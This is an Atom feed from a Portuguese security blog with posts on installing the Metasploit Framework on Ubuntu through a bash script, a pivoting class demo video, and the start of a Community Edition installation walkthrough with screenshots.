<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3387717746309894142</id><updated>2011-12-19T00:35:40.115-02:00</updated><category term='sim+ rtl8191 linux'/><category term='tcpdump'/><category term='SHODAN'/><category term='Network TAP'/><category term='Bluetooth Hacking'/><category term='TAP'/><category term='BackTrack Brasil'/><category term='metasploit'/><category term='rtl8191'/><category term='Vulnerabilidade'/><category term='wireshark'/><category term='Bonding'/><category term='Tráfego de Rede'/><category term='Curso Metasploit'/><category term='Pwntooth'/><category term='Msfconsole'/><category term='MSF'/><category term='sniffers'/><category term='Pen testing'/><category term='Bluetooth'/><category term='Hacking'/><category term='Computer Search Engine'/><category term='sniffing'/><category term='BackTrack'/><category term='meterpreter'/><title type='text'>CodeSec - How to?</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>20</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-293061805969717546</id><published>2011-11-27T23:13:00.002-02:00</published><updated>2011-11-27T23:18:12.481-02:00</updated><title type='text'>[Shell-Script] Install Metasploit in Ubuntu for Beginner</title><content type='html'>Devido receber vários e-mails perguntando como se instala (e quando digo vários, é vários meeeesmo :S) o metasploit no ubuntu, resolvi fazer rapidamente este script para tal fim.&lt;br /&gt;É eu sei que o código tem bugs, mais ao que se propõe ele cumpre. :D&lt;br /&gt;Testado nas versões 11.04 e 11.10.&lt;br /&gt;&lt;br /&gt;&lt;pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"&gt;&lt;code&gt;#!/bin/bash&lt;br /&gt;&lt;br /&gt;clear&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;echo " &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ..:[ Install MSF ]:.."&lt;br /&gt;echo&lt;br /&gt;echo " &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Roberto Soares (espreto)"&lt;br /&gt;echo " &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;robertoespreto@gmail.com"&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;echo "[+] Install the Metasploit Framework on Ubuntu Linux now? y/n "; read whx&lt;br /&gt;&amp;nbsp; &amp;nbsp;if [ $whx = "y" ]&lt;br /&gt;&amp;nbsp; &amp;nbsp;then&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "[+] Installing the Ruby dependencies..."&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; apt-get install -y ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "OK!"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "[+] Installing the Subversion client..."&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; apt-get install -y subversion 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "OK!"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "[+] Installing extensions (pcaprub, lorcon2, etc)..."&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; apt-get install -y build-essential ruby-dev libpcap-dev 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "OK!"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "[+] Download framework..."&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; wget -c http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "[+] Unpacking the file..."&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; tar -jxvf framework-latest.tar.bz2 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; mkdir -p /opt/metasploit&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; cp -a msf/ /opt/metasploit/msf3&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; chown root:root -R /opt/metasploit/msf3&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; ln -sf /opt/metasploit/msf3/msf* /usr/local/bin/&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; rm -rf msf/&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "OK!"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; CONGRATULATIONS! Install Metasploit Successful!!!"&lt;br /&gt;&amp;nbsp; &amp;nbsp;else&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo &amp;nbsp; &amp;nbsp; &lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "Why?"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp;You do not know what you're missing!"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; exit 0;&lt;br /&gt;&amp;nbsp; &amp;nbsp;fi&lt;br /&gt;echo&lt;br /&gt;&lt;br /&gt;echo "[+] Update now? y/n "; read whx&lt;br /&gt;&amp;nbsp; &amp;nbsp;if [ $whx = "y" ]&lt;br /&gt;&amp;nbsp; &amp;nbsp;then&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; Wait..."&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; msfupdate 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; OK!"&lt;br /&gt;&amp;nbsp; &amp;nbsp;else&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; &amp;nbsp; Future use in the terminal: msfupdate"&lt;br /&gt;&amp;nbsp; &amp;nbsp;fi&lt;br /&gt;echo&lt;br /&gt;echo "[+] Install PostgreSQL Database now? y/n "; read whx&lt;br /&gt;&amp;nbsp; &amp;nbsp;if [ $whx = "y" ]&lt;br /&gt;&amp;nbsp; &amp;nbsp;then&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; Wait..."&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; apt-get install -y postgresql-8.4 rubygems libpq-dev 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; gem install pg 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; apt-get install -y libreadline-dev libssl-dev libpq5 ruby-dev 1&amp;gt; /dev/null 2&amp;gt; /dev/stdout&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; OK!"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "1º Choice a username (user for connect in database):" ; read username&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; sudo -u postgres createuser -D -A -P $username&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; Done!"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo "2º Choice a database name (that will be used by msf):" ; read db_name&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; sudo -u postgres createdb -O $username $db_name&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; Done!"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Connect to the postgreSQL database in msfconsole using:"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; msf&amp;gt; db_driver postgresql"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; msf&amp;gt; db_connect $username:password@127.0.0.1/$db_name"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo " &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; msf&amp;gt; db_status"&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; echo&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; sleep 8&lt;br /&gt;&amp;nbsp; &amp;nbsp;fi&lt;br /&gt;clear&lt;br /&gt;echo&lt;br /&gt;echo " &amp;nbsp; &amp;nbsp; Installation Complete!"&lt;br /&gt;echo " &amp;nbsp;In terminal, run: msfconsole"&lt;br /&gt;echo&lt;br /&gt;echo&lt;br /&gt;echo " &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Good bye!"&lt;br /&gt;echo&lt;br /&gt;# end script&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;:wq!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-293061805969717546?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/293061805969717546/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/11/install-msf-via-shell-script.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/293061805969717546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/293061805969717546'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/11/install-msf-via-shell-script.html' title='[Shell-Script] Install Metasploit in Ubuntu for Beginner'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-5359332256057651104</id><published>2011-11-21T05:02:00.000-02:00</published><updated>2011-11-21T05:02:48.804-02:00</updated><title type='text'>Hack Training - Demo aula sobre Pivoting</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Olá pessoal!&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Segue uma pequena demonstração de uma aula ministrada alguns dias atrás, resolvi disponibilizar aqui para que conheçam um pouco mais da infraestrutura do treinamento.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Realizei apenas a gravação da parte "Desktop&amp;nbsp;Sharing", onde é visualizado em tempo real as atividades que o instrutor está realizando. Ainda temos o recurso de chat, imagem de exibição do instrutor, perguntas e respostas através de pop-ups, etc.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Veja abaixo o vídeo.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/_qe7Azadhxk" width="480"&gt;&lt;/iframe&gt; &lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;No dia 23/11 (quarta-feira) colocarei um novo vídeo aqui no blog falando sobre backdoor, fiquem atentos.&lt;br /&gt;&lt;br /&gt;Se interessou pelo treinamento? Acesse: &lt;a href="http://www.hacktraining.com.br/msf"&gt;www.hacktraining.com.br/msf&lt;/a&gt; e inscreva-se.&lt;br /&gt;&lt;br /&gt;Att,&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-5359332256057651104?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/5359332256057651104/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/11/hack-training-demo-aula-sobre-pivoting.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/5359332256057651104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/5359332256057651104'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/11/hack-training-demo-aula-sobre-pivoting.html' title='Hack Training - Demo aula sobre Pivoting'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/_qe7Azadhxk/default.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-2692982027470896223</id><published>2011-11-09T17:32:00.000-02:00</published><updated>2011-11-09T17:32:08.450-02:00</updated><title type='text'>Metasploit Community Edition - Instalation</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: large;"&gt;&lt;b&gt;puts "Hello people!"&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;O que é Metasploit Community Edition?&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Veja segundo o próprio site:&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;"If you are trying to learn about Metasploit and penetration testing, Metasploit Community Edition is your best option. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose - for free. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence. IT professionals can demonstrate the impact of vulnerabilities to IT operations to obtain buy-in for remediation."&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Fonte:&amp;nbsp;&lt;/span&gt;&lt;a href="http://metasploit.com/about/choose-right-edition/" style="font-family: Verdana, sans-serif;"&gt;http://metasploit.com/about/choose-right-edition/&lt;/a&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;A partir desde post, irei relatar algumas particularidades de uso do recente framework lançado pela Rapid7, o "Metasploit Community Edition". Como seu lançamento ocorreu a pouquíssimo tempo, ainda não há documentação (eu acho, existe?) em português sobre o mesmo. Nesta série de 5 posts, iremos abordar os seguintes tópicos:&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Instalation&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Network Discovery&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Vulnerability Scanner Import&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Basic Exploitation&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Module Browser&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Onde estarei utilizando a distribuição BackTrack 5 R1 para efetuar os "ataques" e também configurei algumas máquinas virtuais para sofrerem os ataques, o software de virtualização utilizado foi o VMWare Player.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Requisitos para seguir este post:&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;VMWare Player;&amp;nbsp;&lt;a href="http://www.vmware.com/products/player/"&gt;http://www.vmware.com/products/player/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;BackTrack 5 R1;&amp;nbsp;&lt;a href="http://www.backtrack-linux.org/downloads/"&gt;http://www.backtrack-linux.org/downloads/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Metasploit Community Edition;&amp;nbsp;&lt;a href="http://metasploit.com/download/"&gt;http://metasploit.com/download/&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: large;"&gt;&lt;b&gt;Let's Go!!!&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Em sua máquina com o BackTrack, acesse o site do Metasploit e efetue o download da versão "Community Edition".&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-B0LVA4PYPRA/TrG8bY3JDHI/AAAAAAAAASU/Y1CxZINK2tY/s1600/ScreenShot001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="267" src="http://2.bp.blogspot.com/-B0LVA4PYPRA/TrG8bY3JDHI/AAAAAAAAASU/Y1CxZINK2tY/s400/ScreenShot001.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Ao término do download, dê permissão de execução ao arquivo. Abra uma shell e digite:&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-CfhXxUd-6Jg/TrG8exLVGtI/AAAAAAAAASg/9ZD-j5WgbuM/s1600/ScreenShot002.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="86" src="http://4.bp.blogspot.com/-CfhXxUd-6Jg/TrG8exLVGtI/AAAAAAAAASg/9ZD-j5WgbuM/s400/ScreenShot002.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Agora execute o arquivo (não vá matar o arquivo com um tiro ok? :P) com o comando "./metasploit-latest-linux-installer.run" (sem aspas) conforme figura abaixo.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-j3xLhyEHlIo/TrG8tJLsLAI/AAAAAAAAASs/nrrCLFCvfiU/s1600/ScreenShot003.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="262" src="http://4.bp.blogspot.com/-j3xLhyEHlIo/TrG8tJLsLAI/AAAAAAAAASs/nrrCLFCvfiU/s400/ScreenShot003.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;As etapas de instalação se inciará assim que você clicar em "Forward".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-KkK-v9zG0x4/TrG8uNCwaNI/AAAAAAAAAS4/PStDKSf9l6A/s1600/ScreenShot004.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="312" src="http://4.bp.blogspot.com/-KkK-v9zG0x4/TrG8uNCwaNI/AAAAAAAAAS4/PStDKSf9l6A/s400/ScreenShot004.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Aqui você precisa aceitar os termos de lincensa e clicar em "Forward".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-XMlbkczldZE/TrG8uEZFSoI/AAAAAAAAATE/4GyE7uEqF8Y/s1600/ScreenShot005.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="307" src="http://1.bp.blogspot.com/-XMlbkczldZE/TrG8uEZFSoI/AAAAAAAAATE/4GyE7uEqF8Y/s400/ScreenShot005.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Selecione o diretório onde será realizada a instalação. Não existe a necessidade de alterar nada a princípio, deixe como está e clique em "Forward".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-fPpybt8iFVw/TrG8uvG34MI/AAAAAAAAATU/OdOMFyeUccQ/s1600/ScreenShot006.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="298" src="http://1.bp.blogspot.com/-fPpybt8iFVw/TrG8uvG34MI/AAAAAAAAATU/OdOMFyeUccQ/s400/ScreenShot006.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Aqui ele pergunta se você deseja instalar o metasploit como um serviço, ou seja, toda vez que a máquina for ligado/reiniciada automaticamente será iniciado o metasploit deixando-o pronto para uso. Selecione "Yes" e clique em "Forward".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-_2Xj-tSInV4/TrG8u2funKI/AAAAAAAAATc/nbhBFYGJi6Y/s1600/ScreenShot007.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="305" src="http://1.bp.blogspot.com/-_2Xj-tSInV4/TrG8u2funKI/AAAAAAAAATc/nbhBFYGJi6Y/s400/ScreenShot007.png" width="400" 